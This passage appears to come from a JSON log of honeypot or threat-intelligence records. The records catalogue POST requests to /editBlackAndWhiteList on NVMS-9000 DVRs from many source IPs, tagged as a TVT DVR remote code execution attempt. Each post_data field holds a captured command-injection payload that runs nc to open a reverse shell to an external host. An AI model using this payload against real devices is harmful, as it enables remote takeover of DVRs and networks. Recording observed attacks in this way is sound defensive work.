- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T23:31:23Z",
- "last_seen": "2019-12-22T23:31:23Z"
- },
- {
- "source_ip_address": "202.186.145.45",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T23:29:33Z",
- "last_seen": "2019-12-22T23:29:33Z"
- },
- {
- "source_ip_address": "182.235.239.22",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T23:24:46Z",
- "last_seen": "2019-12-22T23:24:46Z"
- },
- {
- "source_ip_address": "82.79.150.228",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T23:12:31Z",
- "last_seen": "2019-12-22T23:12:31Z"
- },
- {
- "source_ip_address": "189.226.125.58",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T23:10:50Z",
- "last_seen": "2019-12-22T23:10:50Z"
- },
- {
- "source_ip_address": "99.239.82.168",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-22T23:00:01Z",
- "last_seen": "2019-12-22T23:00:01Z"
- },
- {
- "source_ip_address": "98.14.209.24",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T22:52:42Z",
- "last_seen": "2019-12-22T22:52:42Z"
- },
- {
- "source_ip_address": "189.211.0.101",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T22:47:44Z",
- "last_seen": "2019-12-22T22:47:44Z"
- },
- {
- "source_ip_address": "84.117.145.21",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 10,
- "first_seen": "2019-12-22T22:31:39Z",
- "last_seen": "2019-12-22T22:31:39Z"
- },
- {
- "source_ip_address": "115.132.165.187",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-22T22:31:05Z",
- "last_seen": "2019-12-22T22:31:05Z"
- },
- {
- "source_ip_address": "81.97.225.87",
- "country": "GB",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T22:13:40Z",
- "last_seen": "2019-12-22T22:13:40Z"
- },
- {
- "source_ip_address": "114.33.239.180",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T22:12:56Z",
- "last_seen": "2019-12-22T22:12:56Z"
- },
- {
- "source_ip_address": "49.158.65.3",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T21:46:07Z",
- "last_seen": "2019-12-22T21:46:07Z"
- },
- {
- "source_ip_address": "76.184.117.14",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T21:29:21Z",
- "last_seen": "2019-12-22T21:29:21Z"
- },
- {
- "source_ip_address": "211.75.246.171",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T21:26:27Z",
- "last_seen": "2019-12-22T21:26:27Z"
- },
- {
- "source_ip_address": "114.35.190.194",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T21:19:17Z",
- "last_seen": "2019-12-22T21:19:17Z"
- },
- {
- "source_ip_address": "220.135.136.169",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T21:17:18Z",
- "last_seen": "2019-12-22T21:17:18Z"
- },
- {
- "source_ip_address": "189.172.5.19",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T21:13:32Z",
- "last_seen": "2019-12-22T21:13:32Z"
- },
- {
- "source_ip_address": "82.80.132.136",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T21:01:08Z",
- "last_seen": "2019-12-22T21:01:08Z"
- },
- {
- "source_ip_address": "220.132.118.50",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T20:45:26Z",
- "last_seen": "2019-12-22T20:45:26Z"
- },
- {
- "source_ip_address": "122.116.167.31",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 20,
- "first_seen": "2019-12-22T20:43:31Z",
- "last_seen": "2019-12-22T20:43:31Z"
- },
- {
- "source_ip_address": "114.199.52.199",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-19T04:04:46Z",
- "last_seen": "2019-12-22T20:22:53Z"
- },
- {
- "source_ip_address": "66.169.170.17",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T20:21:01Z",
- "last_seen": "2019-12-22T20:21:01Z"
- },
- {
- "source_ip_address": "168.121.41.124",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T20:20:02Z",
- "last_seen": "2019-12-22T20:20:02Z"
- },
- {
- "source_ip_address": "115.134.11.32",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T20:12:04Z",
- "last_seen": "2019-12-22T20:12:04Z"
- },
- {
- "source_ip_address": "5.12.77.175",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-21T06:32:29Z",
- "last_seen": "2019-12-22T19:48:25Z"
- },
- {
- "source_ip_address": "50.241.64.78",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T19:38:47Z",
- "last_seen": "2019-12-22T19:38:47Z"
- },
- {
- "source_ip_address": "220.135.85.156",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
